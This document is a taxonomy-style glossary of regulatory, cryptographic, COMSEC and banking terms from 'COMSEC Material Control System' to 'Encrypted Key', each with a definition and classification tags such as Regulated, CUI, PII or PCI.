COMSEC Material Control SystemnounLogistics and accounting system through which COMSEC material marked "CRYPTO" is distributed, controlled, and safeguarded. Included are the COMSEC central offices of record, crypto logistic depots, and COMSEC accounts. COMSEC material other than key may be handled through the CMCS.SystemRegulatedCUI
COMSEC ModulenounRemovable component that performs COMSEC functions in a telecommunications equipment or system.PhysicalRegulatedCUI
COMSEC MonitoringnounAct of listening to, copying, or recording transmissions of one's own official telecommunications to analyze the degree of security.ProcessRegulatedCUI
COMSEC ProfilenounStatement of COMSEC measures and materials used to protect a given operation, system, or organization.ArtifactRegulatedCUI
COMSEC System DatanounInformation required by a COMSEC equipment or system to enable it to properly handle and control key.DataRegulatedCUI
COMSEC TrainingnounTeaching of skills relating to COMSEC accounting, use of COMSEC aids, or installation, use, maintenance, and repair of COMSEC equipment.ProcessRegulatedCUI
configuration change control processnounAn action that is taken or performed to systematically manage all changes made to an asset's arrangement, system configuration, or security configuration in order to prevent unnecessary disruptions, vulnerabilities, and mitigate threats. Its purpose is to ensure that all changes to a complex system are performed with the knowledge and consent of management.ProcessRegulated
configuration change managementnounA process for managing configuration changes and variances in configurations.ProcessRegulated
Configuration ControlnounProcess of controlling modifications to hardware, firmware, software, and documentation to protect the information system against improper modification prior to, during, and after system implementation.ProcessRegulated
constitutenounGive legal or constitutional form to (an institution); establish by law.RequirementRegulated
ConsumernounUsually refers to an individual engaged in non-commercial transactions.IdentityRegulatedPII
Consumer AccountnounA deposit account held by a participating depository financial institution and established by a natural person primarily for personal, family, or household use and not for commercial purposes.DataRegulatedPII
Consumer informationnounFor purposes of the Information Security Standards, “consumer information” means any record about an individual, whether in paper, electronic, or other form, that is a consumer report or is derived from a consumer report that is maintained by or on behalf of a financial institution for a business purpose, such as information that an institution obtains about a loan applicant or a prospective employee from a consumer report.DataRegulatedPII
contact informationnounInformation usually containing the person's telephone number(s), fax number, address, and electronic mail address(es).DataRegulatedPII
ContaminationnounType of incident involving the introduction of data of one security classification or security category into data of a lower security classification or different security category.EventRegulatedCUI
Contingency KeynounKey held for use under specific operational conditions or in support of specific contingency plans. See Reserve Keying Material.CredentialRegulatedCUI
Contingency PlanningnounThe purpose of this task is to support the required actions for planning, responding, and mitigating damaging events.ProcessRegulated
Continuous MonitoringnounThe process implemented to maintain a current security status for one or more information systems or for the entire suite of information systems on which the operational mission of the enterprise depends. The process includes: 1) The development of a strategy to regularly evaluate selected IA controls/metrics, 2) Recording and evaluating IA relevant events and the effectiveness of the enterprise in dealing with those events, 3) Recording changes to IA controls, or changes that affect IA risks, and 4) Publishing the current security status to enable information-sharing decisions involving the enterprise.ProcessRegulatedCUI
Control requirementsnounProcess used to document and/or track internal processes to determine that those established procedures and/or physical security policies are being followed.RequirementRegulated
Controlled Access AreanounPhysical area (e.g., building, room, etc.) to which only authorized personnel are granted unrestricted access. All other personnel are either escorted by authorized personnel or are under continuous surveillance.PhysicalRegulated
Controlled Cryptographic ItemnounSecure telecommunications or information system, or associated cryptographic component, that is unclassified and handled through the COMSEC Material Control System (CMCS), an equivalent material control system, or a combination of the two that provides accountability and visibility. Such items are marked “Controlled Cryptographic Item,” or, where space is limited, “CCI”.PhysicalRegulatedCUI
Controlled Cryptographic Item AssemblynounDevice embodying a cryptographic logic or other COMSEC design that NSA has approved as a Controlled Cryptographic Item (CCI). It performs the entire COMSEC function, but depends upon the host equipment to operate.PhysicalRegulatedCUI
Controlled Cryptographic Item ComponentnounPart of a Controlled Cryptographic Item (CCI) that does not perform the entire COMSEC function but depends upon the host equipment, or assembly, to complete and operate the COMSEC function.PhysicalRegulatedCUI
Controlled Cryptographic Item EquipmentnounTelecommunications or information handling equipment that embodies a Controlled Cryptographic Item (CCI) component or CCI assembly and performs the entire COMSEC function without dependence on host equipment to operate.PhysicalRegulatedCUI
Controlled SpacenounThree-dimensional space surrounding information system equipment, within which unauthorized individuals are denied unrestricted access and are either escorted by authorized individuals or are under continuous physical or electronic surveillance.PhysicalRegulated
Controlled Unclassified InformationnounA categorical designation that refers to unclassified information that does not meet the standards for National Security Classification under Executive Order 12958, as amended, but is (i) pertinent to the national interests of the United States or to the important interests of entities outside the federal government, and (ii) under law or policy requires protection from unauthorized disclosure, special handling safeguards, or prescribed limits on exchange or dissemination. Henceforth, the designation CUI replaces "Sensitive But Unclassified" (SBU).RequirementRegulatedCUI
Controlling AuthoritynounOfficial responsible for directing the operation of a cryptonet and for managing the operational use and control of keying material assigned to the cryptonet.RoleRegulatedCUI
Conversion plannounA plan that details transition planning and implementation issues in the period between the execution of an outsourcing agreement and the full production use of the outsourced services.ProcessRegulated
Core firmnounCore clearing and settlement organization that serves critical financial markets.OrganizationRegulated
Correspondent BanknounAn institution, acting on behalf of other institutions, that can settle the checks they collect for other institutions (respondents) by using accounts on their books or by sending a wire funds transfers. Generally, a provider of banking and payment services to other financial institutions.OrganizationRegulated
Covered EntitynounAny Person operating under or required to operate under a license, registration, charter, certificate, permit, accreditation or similar authorization under the Banking Law, the Insurance Law or the Financial Services Law.OrganizationRegulated
Covert Storage ChannelnounCovert channel involving the direct or indirect writing to a storage location by one process and the direct or indirect reading of the storage location by another process. Covert storage channels typically involve a finite resource (e.g., sectors on a disk) that is shared by two subjects at different security levels.VulnerabilityRegulatedCUI
Covert Timing ChannelnounCovert channel in which one process signals information to another process by modulating its own use of system resources (e.g., central processing unit time) in such a way that this manipulation affects the real response time observed by the second process.VulnerabilityRegulated
Credential Service ProvidernounA trusted entity that issues or registers Subscriber tokens and issues electronic credentials to Subscribers. The CSP may encompass Registration Authorities (RAs) and Verifiers that it operates. A CSP may be an independent third party, or may issue credentials for its own use.OrganizationRegulated
Credit CardnounA card indicating the holder has been granted a line of credit. It enables the holder to make purchases or withdraw cash up to a prearranged ceiling. The credit granted can be settled in full by the end of a specified period or can be settled in part, with the balance taken as extended credit. Interest is charged based on the terms of the credit card agreement and the holder is sometimes charged an annual fee.DataRegulatedPCI
Credit EntrynounAn entry to the record of an account that represents the transfer or placement of funds into the account.ArtifactRegulatedPCI
credit policynounA company's policy on when its customers should pay for goods or services they have ordered a government's policy at a particular time on how easy or difficult it should be for people and businesses to borrow and how much it should cost. The government influences this through changes in interest rates.RequirementRegulated
criminal records checknounThe purpose of this task is to determine if a person has been convicted of a crime.ProcessRegulatedPII
critical business processnounA business process that must be restored immediately after a disruption to ensure the affected firm's ability to protect its assets, meet its critical needs, and satisfy mandatory regulations and requirements.ProcessRegulated
Critical Financial MarketsnounFinancial markets whose operations are critical to the economy. Critical financial markets provide the means for financial institutions to adjust their cash and securities positions and those of their customers in order to manage liquidity, market, and other risks to their organizations. Critical financial markets also provide support for the provision of a wide range of financial services to businesses and consumers in the United States and support the implementation of monetary policy. Examples of "critical financial markets" include: • Federal funds, foreign exchange, and commercial paper; • U.S. Government and agency securities; and • Corporate debt and equity securities.SystemRegulated
Critical infrastructurenounSystem and assets, whether physical or virtual, so vital to the U.S. that the incapacity or destruction of such systems and assets would have a debilitating impact on security, national economic security, national public health or safety, or any combination of those matters. [Critical Infrastructures Protection Act of 2001, 42 U.S.C. 5195c(e)]SystemRegulatedCUI
Critical Market ParticipantsnounParticipants in the financial markets that perform critical operations or provide critical services. Their inability to perform these operations or services could result in major disruptions in the financial system.OrganizationRegulated
critical operationsnounAny activity, function, process, or service, the loss of which, for even a short period of time, would materially affect the continued operation of an FMI, its participants, the market it serves, and/or the broader financial system.ProcessRegulated
Critical PathnounThe critical path represents the business processes or systems that must receive the highest priority during the recovery phase.ProcessRegulated
Critical system (infrastructure)nounThe systems and assets, whether physical or virtual, that are so vital that the incapacity or destruction of such may have a debilitating impact.SystemRegulated
Cross Site ScriptingnounA vulnerability that allows attackers to inject malicious code into an otherwise benign website. These scripts acquire the permissions of scripts generated by the target website and can therefore compromise the confidentiality and integrity of data transfers between the website and client. Websites are vulnerable if they display user supplied data from requests or forms without sanitizing the data so that it is not executable.VulnerabilityRegulated
Cross-Domain CapabilitiesnounThe set of functions that enable the transfer of information between security domains in accordance with the policies of the security domains involved.CapabilityRegulated
Cross-Domain SolutionnounA form of controlled interface that provides the ability to manually and/or automatically access and/or transfer information between different security domains.ControlRegulatedCUI
Crypto OfficernounAn operator or process (subject), acting on behalf of the operator, performing cryptographic initialization or management functions.RoleRegulated
Cryptographic AlarmnounCircuit or device that detects failures or aberrations in the logic or operation of crypto-equipment. Crypto-alarm may inhibit transmission or may provide a visible and/or audible alarm.EventRegulatedCUI
Cryptographic Ancillary EquipmentnounEquipment designed specifically to facilitate efficient or reliable operation of cryptographic equipment, without performing cryptographic functions itself.PhysicalRegulatedCUI
Cryptographic BoundarynounAn explicitly defined continuous perimeter that establishes the physical bounds of a cryptographic module and contains all the hardware, software, and/or firmware components of a cryptographic module.ControlRegulated
Cryptographic ComponentnounHardware or firmware embodiment of the cryptographic logic. A cryptographic component may be a modular assembly, a printed wiring assembly, a microcircuit, or a combination of these items.PhysicalRegulatedCUI
Cryptographic Ignition KeynounDevice or electronic key used to unlock the secure mode of crypto-equipment.CredentialRegulatedCUI
Cryptographic LogicnounThe embodiment of one (or more) cryptographic algorithm(s) along with alarms, checks, and other processes essential to effective and secure performance of the cryptographic process(es).CapabilityRegulated
Cryptographic MaterialnounCOMSEC material used to secure or authenticate information.CredentialRegulatedCUI
Cryptographic ModulenounThe set of hardware, software, firmware, or some combination thereof that implements cryptographic logic or processes, including cryptographic algorithms, and is contained within the cryptographic boundary of the module.SystemRegulated
Cryptographic Module Validation ProgramnounValidates cryptographic modules to Federal Information Processing Standard (FIPS) 140-2 and other cryptography-based standards. The CMVP is a joint effort between National Institute of Standards and Technology (NIST) and the Communications Security Establishment (CSE) of the government of Canada. Products validated as conforming to FIPS 140-2 are accepted by the federal agencies of both countries for the protection of sensitive information (United States) or Designated Information (Canada). The goal of the CMVP is to promote the use of validated cryptographic modules and provide federal agencies with a security metric to use in procuring equipment containing validated cryptographic modules.CapabilityRegulatedCUI
Cryptographic SecuritynounComponent of COMSEC resulting from the provision of technically sound cryptographic systems and their proper use.CapabilityRegulatedCUI
Cryptographic SynchronizationnounProcess by which a receiving decrypting cryptographic logic attains the same internal state as the transmitting encrypting logic.ProcessRegulated
Cryptographic SystemnounAssociated information assurance items interacting to provide a single means of encryption or decryption.SystemRegulated
Cryptographic System AnalysisnounProcess of establishing the exploitability of a cryptographic system, normally by reviewing transmitted traffic protected or secured by the system under study.ProcessRegulatedCUI
Cryptographic System EvaluationnounProcess of determining vulnerabilities of a cryptographic system and recommending countermeasures.ProcessRegulated
Cryptographic System ReviewnounExamination of a cryptographic system by the controlling authority ensuring its adequacy of design and content, continued need, and proper distribution.ProcessRegulatedCUI
Currency BalancenounAs at the time calculated, the current amount (positive or negative) of a particular eligible currency included in an account, as indicated on the books and records of CLS Bank. A currency balance is not a separate account.DataRegulated
customer accessnounA customer’s ability and means to communicate or interact with a system, use system resources or to control system components and functions.CapabilityRegulated
customer accountnounA client's formal contract with an individual or organization whereby the client receives goods or services.IdentityRegulatedPII
customer data privacynounThe ability an organization or individual has to determine what customer data in a computer system can be shared with third parties.RequirementRegulatedPII
customer informationnounA term used in the Information Security Standards to mean any record containing non-public personal information about a customer, whether in paper, electronic, or other form, that is maintained by or on behalf of a financial institution.DataRegulatedPII
customer information systemnounFor purposes of the Information Security Standards, “customer information systems” means any methods used to access, collect, store, use, transmit, protect, or dispose of customer information.SystemRegulatedPII
cyber assetnounProgrammable electronic devices and communication networks including hardware, software and data.SystemRegulatedCUI
Cyber AttacknounAn attack, via cyberspace, targeting an enterprise’s use of cyberspace for the purpose of disrupting, disabling, destroying, or maliciously controlling a computing environment/infrastructure; or destroying the integrity of the data or stealing controlled information.ThreatRegulated
cyber incidentnounActions taken through the use of computer networks that result in an actual or potentially adverse effect on an information system and/or the information residing therein. See Incident.EventRegulated
cyber incident response plannounThe series of actions and processes associated with a security event associated with 'cyberspace' (i.e. the Internet, corporate networks, etc.).ProcessRegulated
cyber incident response roles and responsibilitiesnounThe functions and duties of personnel who are responsible for triaging, and resolving events regarding cybersecurity events that disrupt operations and alerting interested personnel and affected parties in conformance with pertinent standards.ProcessRegulated
cyber infrastructurenounIncludes electronic information and communications systems and services and the information contained in these systems and services. Information and communications systems and services are composed of all hardware and software that process, store, and communicate information, or any combination of all of these elements. Processing includes the creation, access, modification, and destruction of information. Storage includes paper, magnetic, electronic, and all other media types. Communications include sharing and distribution of information. For example: computer systems; control systems (e.g., supervisory control and data acquisition–SCADA); networks, such as the Internet; and cyber services (e.g., managed security services) are part of cyber infrastructure.SystemRegulated
cyber resilience frameworknounConsists of the policies, procedures and controls an FMI has established to identify, protect, detect, respond to and recover from the plausible sources of cyber risks it faces.FrameworkRegulated
cyber risk managementnounThe process used by an FMI to establish an enterprise-wide framework to manage the likelihood of a cyber attack and develop strategies to mitigate, respond to, learn from and coordinate its response to the impact of a cyber attack. The management of an FMI’s cyber risk should support the business processes and be integrated in the FMI’s overall risk management framework.ProcessRegulated
cyber supply chain risk assessment processnounThe foundational task in the cyber supply chain risk assessment process, cyber supply chain risk assessments are aimed at identifying and assessing applicable risk of Information and operational technology (IT/OT) outsourcing, diverse distribution routes, assorted technologies, laws, policies, procedures, and practices.ProcessRegulated
cyber supply chain risk management processnounA detailed description of the steps necessary to mitigating the risks associated with the distributed and interconnected nature of IT/OT product and service supply chains. It covers the entire life cycle of a system (including design, development, distribution, deployment, acquisition, maintenance, and destruction) as supply chain threats and vulnerabilities may intentionally or unintentionally compromise an IT/OT product or service at any stage.ProcessRegulated
cyber system recovery plannounA step-by-step outline of the processes and procedures to be performed to bring a cyber system back to working order after an incident has occurred.ProcessRegulatedCUI
cyber threatnounAn internal or external circumstance, event, action, occurrence, or person with the potential to exploit technology-based vulnerabilities and to adversely impact (create adverse consequences for) organizational operations, organizational assets (including information and information systems), individuals, other organizations, or society.ThreatRegulated
cybersecurity controlnounPractices and procedures established to protect organizational assets, user assets, and the cyber environment from unauthorized access, use, disclosure, disruption, modification, or destruction in order to provide integrity, confidentiality, and availability.ControlRegulated
cybersecurity eventnounAny act or attempt, successful or unsuccessful, to gain unauthorized access to, disrupt or misuse an Information System or information stored on such Information System.EventRegulated
cybersecurity incident responsenounThe process of managing and resolving cybersecurity events that disrupt the organization's operations and restoring services.ProcessRegulated
cybersecurity law, rule, or regulationnounAny federal, state, or local statute or ordinance or any rule or regulation adopted according to any federal, state, or local statute or ordinance that deals specifically with the topic of protecting or defending computerized environments, organizational computerized assets, and user’s computerized assets.RequirementRegulated
Cybersecurity outcomenounA Cybersecurity outcome is the business need defined and tiered implementation of the outcomes listed in either the Categories or Subcategories section of Table 2 in the NIST Cybersecurity Framework.RequirementRegulated
cybersecurity plannounFormal document that provides an overview of the cybersecurity requirements for an Information Technology and industrial control system and describes the cybersecurity controls in place or planned for meeting those requirements.RequirementRegulatedCUI
cybersecurity policynounA set of criteria for the provision of security services.RequirementRegulated
cybersecurity programnounAn integrated group of activities designed and managed to meet cybersecurity objectives for the organization and/or the function. A cybersecurity program may be implemented at either the organization or the function level, but a higher-level implementation and enterprise viewpoint may benefit the organization by integrating activities and leveraging resource investments across the entire enterprise.ProcessRegulated
cybersecurity requirementnounRequirements levied on an Information Technology and Operations Technology that are derived from organizational mission and business case needs (in the context of applicable legislation, Executive Orders, directives, policies, standards, instructions, regulations, procedures) to ensure the confidentiality, integrity, and availability of the services being provided by the organization and the information being processed, stored, or transmitted.RequirementRegulated
cybersecurity risknounA risk to organizational operations, (including mission, functions, image, and reputation), resources, and other organizations due to the potential for unauthorized access, use, disclosure, disruption, modification, or destruction of information, Information Technology, and/or Operations Technology.ThreatRegulated
CyberwarfarenounActivities supported by military organizations with the purpose to threat the survival and well-being of society/foreign entityThreatRegulatedCUI
data aggregationnounCompilation of individual data systems and data that could result in the totality of the information being classified, or classified at a higher level, or of beneficial use to an adversary.ProcessRegulatedCUI
data backupnounThe physical copying of data files to a removable storage device that allows the data to be stored in another location.DataRegulated
data breachnounThe unauthorized movement or disclosure of sensitive information to a party, usually outside the organization, that is not authorized to have or see the information.EventRegulated
Data centernounA facility that houses an institution's most important information systems components, including computer systems, telecommunications components, and storage systems.PhysicalRegulated
Data Encryption AlgorithmnounThe DEA cryptographic engine that is used by the Triple Data Encryption Algorithm (TDEA).ControlRegulated
Data Encryption StandardnounCryptographic algorithm designed for the protection of unclassified data and published by the National Institute of Standards and Technology (NIST) in Federal Information Processing Standard (FIPS) Publication 46. (FIPS 46-3 withdrawn 19 May 2005) See Triple DES.ControlRegulated
data lossnounThe exposure of proprietary, sensitive, or classified information through either data theft or data leakage.EventRegulatedIP
Data loss prevention (DLP) programnounA comprehensive approach (covering people, processes, and systems) of implementing policies and controls designed specifically to discover, monitor, and protect confidential data wherever it is stored, used, or in transit over the network and at the perimeter.ProcessRegulated
Data retentionnounRefers to the policies that govern data and records management for meeting internal, legal and regulatory data archival requirementsRequirementRegulated
data storage medianounThe physical form of how data is stored (e.g. magnetic tape, CD-ROM, paper).PhysicalRegulated
Data Transfer DevicenounFill device designed to securely store, transport, and transfer electronically both COMSEC and TRANSEC key, designed to be backward compatible with the previous generation of COMSEC common fill devices, and programmable to support modern mission systems.PhysicalRegulatedCUI
Data-At-RestnounRefers to all data stored on hard drives, thumb drives, DVDs, CDs, floppy diskettes, and similar storage media. It excludes data that is traversing a network or temporarily residing in computer memory to be read or updated.DataRegulated
Daylight overdraftnounA daylight overdraft occurs at any point in the business day when the balance in an institution's account becomes negative. Daylight overdrafts can occur in accounts at Federal Reserve Banks as well as at private financial institutions. Daylight credit can also arise in the form of net debit positions of participants in private payment systems. A daylight overdraft occurs at a Federal Reserve Bank when there are insufficient funds in an institution's Federal Reserve Bank account to cover outgoing funds transfers or incoming book-entry securities transfers. An overdraft can also be the result of other payment activity processed by the Federal Reserve Bank, such as check or automated clearinghouse transactions.EventRegulated
Debit cardnounA payment card issued as either a PIN-based debit (ATM) card or as a signature-based debit card from one of the bankcard associations. A payment card issued to a person for purchasing goods and services through an electronic transfer of funds from a demand deposit account rather than using cash, checks, or drafts at the point-of-sale.PhysicalRegulatedPCI
Debit entrynounAn entry to the record of an account to represent the transfer or removal of funds from the account.DataRegulated
DecertificationnounRevocation of the certification of an information system item or equipment for cause.EventRegulated
Dedicated ModenounInformation systems security mode of operation wherein each user, with direct or indirect access to the system, its peripherals, remote terminals, or remote hosts, has all of the following: 1. valid security clearance for all information within the system, 2. formal access approval and signed nondisclosure agreements for all the information stored and/or processed (including all compartments, subcompartments, and/or special access programs), and 3. valid need-to-know for all information contained within the information system. When in the dedicated security mode, a system is specifically and exclusively dedicated to and controlled for the processing of one particular type or classification of information, either for full-time operation or for a specified period of time.RequirementRegulatedCUI
Default ClassificationnounClassification reflecting the highest classification being processed in an information system. Default classification is included in the caution statement affixed to an object.RequirementRegulatedCUI
DegaussnounProcedure that reduces the magnetic flux to virtual zero by applying a reverse magnetizing field. Also called demagnetizing.ProcessRegulatedCUI
Delegated Development ProgramnounINFOSEC program in which the Director, NSA, delegates, on a case-by-case basis, the development and/or production of an entire telecommunications product, including the INFOSEC portion, to a lead department or agency.ProcessRegulatedCUI
DepositorynounAn institution that holds funds or marketable securities for safekeeping. Depositories may be privately or publicly operated and allow securities transfers through book-entry and offer funds accounts permitting funds transfers as a means of payment.PhysicalRegulatedPCI
Depository banknounThe institution at which a check is first deposited. While this term is often used interchangeably with "depository," "depositary" is a term of art in laws and regulations related to check processing.OrganizationRegulated
Depository bank (Check 21)nounAlso known as Bank of First Deposit (BOFD). The first bank to which a check is transferred even though it is also the paying bank or the payee. A check deposited in an account is deemed to be transferred to the financial institution holding the account into which the check is deposited, even though the check is physically received and endorsed first by another financial institution.OrganizationRegulatedPCI
Descriptive Top-Level SpecificationnounA natural language descriptive of a system’s security requirements, an informal design notation, or a combination of the two.RequirementRegulatedCUI
destructionnounThe purpose of this task is to remove an asset from existence and to ensure media cannot be reused as originally intended and information is virtually impossible to recover or prohibitively expensive to recover.ProcessRegulated
destruction of datanounThe complete physical destruction of data or of the data carrier containing them.ProcessRegulated
Deterministic Random Bit GeneratornounA Random Bit Generator (RBG) that includes a DRBG mechanism and (at least initially) has access to a source of entropy input. The DRBG produces a sequence of bits from a secret initial value called a seed, along with other possible inputs. A DRBG is often called a Pseudorandom Number (or Bit) Generator. Source of entropy input. The DRBG produces a sequence of bits from a secret initial value called a seed, along with other possible inputs. A DRBG is often called a Pseudorandom Number (or Bit) Generator.CapabilityRegulated
Deterministic Random Bit Generator MechanismnounThe portion of an RBG that includes the functions necessary to instantiate and uninstantiate the RBG, generate pseudorandom bits, (optionally) reseed the RBG and test the health of the DRBG mechanism.CapabilityRegulated
Device Distribution ProfilenounAn approval-based Access Control List (ACL) for a specific product that 1) names the user devices in a specific key management infrastructure (KMI) Operating Account (KOA) to which PRSNs distribute the product, and 2) states conditions of distribution for each device.ControlRegulatedCUI
device managementnounManaging the implementation, operation, and maintenance of a physical and/or virtual device. This includes the use of various administrative tools and processes for the maintenance and upkeep of a computing, network, mobile and/or virtual device.ProcessRegulated
Differential Power AnalysisnounAn analysis of the variations of the electrical power consumption of a cryptographic module, using advanced statistical methods and/or other techniques, for the purpose of extracting information correlated to cryptographic keys used in a cryptographic algorithm.ThreatRegulated
Digital EnvelopenounA digital envelope is an encrypted message with the encrypted session key.DataRegulated
Digital forensicsnounThe application of science to the identification, collection, examination, and analysis of data while preserving the integrity of the information and maintaining a strict chain of custody for the data.ProcessRegulated
Digital signaturenounAn asymmetric key operation where the private key is used to digitally sign data and the public key is used to verify the signature. Digital signatures provide authenticity protection, integrity protection, and non-repudiation.CredentialRegulated
Digital Signature StandardnounThe US Government standard that specifies the Digital Signature Algorithm (DSA), which involves asymmetric cryptography.FrameworkRegulated
Direct debitnounElectronic transfer, usually through ACH, out of an individual's checking (or savings) account to pay bills, such as mortgage payments, insurance premiums, and utility payments. Also referred to as "direct payment."DataRegulatedPII
Direct depositnounElectronic deposits or credit, usually through ACH, to an individual's deposit account. Common uses of direct deposit include payroll payments, Social Security benefits, and income from investments such as CDs, annuities, and mutual funds.DataRegulatedPII
Direct presentmentnounDepositary banks can present checks directly to the paying institution. The paying institution may be the depositary bank (no settlement is needed), or, if not, may settle on the books of the Federal Reserve, using the Federal Reserve's national settlement service.ProcessRegulated
Direct ShipmentnounShipment of COMSEC material directly from NSA to user COMSEC accounts.ProcessRegulatedCUI
Disasternoun1. A sudden, unplanned calamitous event causing great damage or loss. Any event that creates an inability on an enterprise's part to provide critical business functions for some predetermined period of time. Similar terms are business interruption, outage and catastrophe. 2. The period when enterprise management decides to divert from normal production responses and exercises its disaster recovery plan (DRP). It typically signifies the beginning of a move from a primary location to an alternate location.EventRegulated
Disk ImagingnounGenerating a bit-for-bit copy of the original media, including free space and slack space.ProcessRegulated
disposalnounThe purpose of this task is to address the final disposition of regulated data by discarding media with no other sanitization considerations or transferring records to their final state: either destruction or transfer to an archive.ProcessRegulatedCUI
Drop AccountabilitynounProcedure under which a COMSEC account custodian initially receipts for COMSEC material, and provides no further accounting for it to its central office of record. Local accountability of the COMSEC material may continue to be required. See Accounting Legend Code.ProcessRegulatedCUI
Due carenounThe level of care expected from a reasonable person of similar competency under similar conditionsRequirementRegulated
due diligencenounThe purpose of this task is to take reasonable action in order to comply with a law or industry standard.ProcessRegulated
due diligence processnounThe series of actions an organization takes to implement the steps needed to ensure they respect human rights and do not contribute to conflict.ProcessRegulated
Duplicate Digital EvidencenounA duplicate is an accurate digital reproduction of all data objects contained on the original physical item and associated media.ArtifactRegulatedCUI
E-BankingnounThe remote delivery of new and traditional banking products and services through electronic delivery channels.SystemRegulatedPCI
E-GovernmentnounThe use by the U.S. government of Web-based Internet applications and other information technology.CapabilityRegulatedCUI
Eavesdropping AttacknounAn attack in which an Attacker listens passively to the authentication protocol to capture information which can be used in a subsequent active attack to masquerade as the Claimant.ThreatRegulated
ecosystemnounA system or group of interconnected elements, formed linkages and dependencies. For an FMI, this may include participants, linked FMIs, service providers, vendors and vendor products.SystemRegulated
Electricity Sector Information Sharing and Analysis CenternounThe Electricity Sector Information Sharing and Analysis Center (ES-ISAC) shares critical information with industry participants about infrastructure protection. The ES-ISAC serves the electricity sector by facilitating communications between electricity sector participants, federal governments, and other critical infrastructures. It is the job of the ES-ISAC to promptly disseminate threat indications, vulnerabilities, analyses, and warnings, together with interpretations, to help electricity sector participants take protective actions.OrganizationRegulatedCUI
electronic accessnounThe right or opportunity to use or retrieve something or enter a place through electronic means.ControlRegulated
electronic access controlnounA cyber asset that performs electronic access control of the Electronic Security Perimeter(s) or BES Cyber Systems.ControlRegulatedCUI
Electronic Access PointnounA Cyber Asset interface on an Electronic Security Perimeter that allows routable communication between Cyber Assets outside an Electronic Security Perimeter and Cyber Assets inside an Electronic Security Perimeter.NetworkRegulatedCUI
Electronic Benefits Transfer (EBT)nounA type of EFT system involving the transfer of public entitlement payments, such as welfare or food stamps, through direct deposit or point-of-sale technology (see POS). The recipient can be given an identification card, similar to a benefit card, and a PIN allowing access to the benefits through an electronic network.SystemRegulatedPII
Electronic bill presentment and payment (EBPP)nounAn electronic alternative to traditional bill payment, allowing a merchant or utility to present its customers with an electronic bill and the payer to pay the bill electronically. EBPP systems usually fall within two models: direct and consolidation-aggregation. In the direct model, the merchant or utility generates an electronic version of the consumer's billing information, and notifies the consumer of a pending bill, generally via e-mail. The consumer can initiate payment of the electronically presented bill using a variety of payment mechanisms, typically a credit card. In the consolidation-aggregation model, the consumer's bills are consolidated by a consolidator acting on behalf of merchants and utilities (or aggregated on behalf of the consumer), combining data from multiple bills and presenting a single source for the consumer to initiate payment. Some consolidators present bills at their own web sites, typically most support the aggregation of bills by consumer service providers such an Internet portals, financial institutions, and brokerage web sites.SystemRegulatedPCI
Electronic check conversionnounThe process by which a check is used as a source of information for the check number, the customer's account number, and the number that identifies the financial institution. The information is used to make a one-time electronic payment from the customer's account -- an electronic fund transfer. The check itself is not the method of payment.ProcessRegulatedPII
Electronic check presentment (ECP)nounCheck truncation methodology in which the paper check's MICR line information is captured and stored electronically for presentment. The physical checks may or may not be presented after the electronic files are delivered, depending on the type of ECP service that is used.ProcessRegulatedPCI
Electronic data capture (EDC)nounProcess used for capturing and transferring the encoded information on the magnetic strip from a bankcard or debit card at the point-of-sale to the processor's database.ProcessRegulatedPCI
Electronic EvidencenounInformation and data of investigative value that is stored on or transmitted by an electronic device.ArtifactRegulated
electronic funds transfernounThe use of telecommunications networks to transfer funds from one financial institution, as a bank, to another, or to withdraw funds from one's own account to deposit in a creditor's.ProcessRegulatedPCI
Electronic funds transfer (EFT)nounA generic term describing any transfer of funds between parties or depository institutions through electronic data systems.ProcessRegulatedPCI
Electronic Funds Transfer Act (EFTA)nounThe Electronic Funds Transfer Act and Regulation E are designed to ensure adequate disclosure of basic terms, costs, and rights relating to electronic fund transfer (EFT) services provided to consumers. Institutions offering EFT services must disclose to consumers certain information, including: initial and updated EFT terms, transaction information, periodic statements of activity, the consumer's potential liability for unauthorized transfers, and error resolution rights and procedures. EFT services include automated teller machines, telephone bill payment, point-of-sale transfers in retail stores, fund transfers initiated through the Internet, and pre-authorized transfers to or from a consumer's account.FrameworkRegulated
electronic funds transfer activitynounAny transfer of funds which is initiated through an electronic terminal, telephonic instrument, computer, or magnetic tape so as to order, instruct, or authorize a financial institution to debit or credit an account. ... These are normally considered retail funds transfer systems.DataRegulatedPCI
electronic funds transfer functionnounAny activity that corresponds with or relates to the transfer of funds electronicallyCapabilityRegulated
Electronic funds transfer point of sale equipmentnounAny, instruments or machinery required for an electric transfer of money to take place.PhysicalRegulatedPCI
Electronic Key EntrynounThe entry of cryptographic keys into a cryptographic module using electronic methods such as a smart card or a key-loading device. (The operator of the key may have no knowledge of the value of the key being entered.)ProcessRegulatedCUI
Electronic Key Management SystemnounInteroperable collection of systems being developed by services and agencies of the U.S. government to automate the planning, ordering, generating, distributing, storing, filling, using, and destroying of electronic key and management of other types of COMSEC material.SystemRegulatedCUI
Electronic Messaging ServicesnounServices providing interpersonal messaging capability; meeting specific functional, management, and technical requirements; and yielding a business-quality electronic mail service suitable for the conduct of official government business.CapabilityRegulatedCUI
Electronic Security PerimeternounThe logical border surrounding a network to which Critical Cyber Assets are connected and for which access is controlled.NetworkRegulatedCUI
electronic signaturenounThe process of applying any mark in electronic form with the intent to sign a data object. See also Digital Signature.CredentialRegulated
Electronic vaultingnounA back-up procedure that copies changed files and transmits them to an off-site location using a batch process.ProcessRegulated
Electronically Generated KeynounKey generated in a COMSEC device by introducing (either mechanically or electronically) a seed key into the device and then using the seed, together with a software algorithm stored in the device, to produce the desired key.CredentialRegulatedCUI
Electronically-created payment ordersnounThese are payment orders received by merchants from consumers, typically by telephone or the Internet. These payment orders are processed through the check processing system although they were not initiated as paper checks. These payment orders are not subject to check law and are not warranted by the Federal Reserve Banks.DataRegulatedPCI
elevated accessnounRoles or permissions that, if misused or compromised, could allow a person to exploit the system for his or her own gain or illicit purpose.ControlRegulated
Emanations SecuritynounProtection resulting from measures taken to deny unauthorized individuals information derived from intercept and analysis of compromising emissions from crypto-equipment or an information system. See TEMPEST.ControlRegulatedCUI
Embedded Cryptographic SystemnounCryptosystem performing or controlling a function as an integral element of a larger system or subsystem.SystemRegulatedCUI
employee accessnounThe privileges to gain entry to somewhere or to use something given only to employees.ControlRegulated
EnclavenounCollection of information systems connected by one or more internal networks under the control of a single authority and security policy. The systems may be structured by physical proximity or by function, independent of location.SystemRegulated
Enclave BoundarynounPoint at which an enclave’s internal network service layer connects to an external network’s service layer, i.e., to another enclave or to a Wide Area Network (WAN).NetworkRegulated
Encrypted KeynounA cryptographic key that has been encrypted using an Approved security function with a key encrypting key, a PIN, or a password in order to disguise the value of the underlying plaintext key.CredentialRegulatedCUI
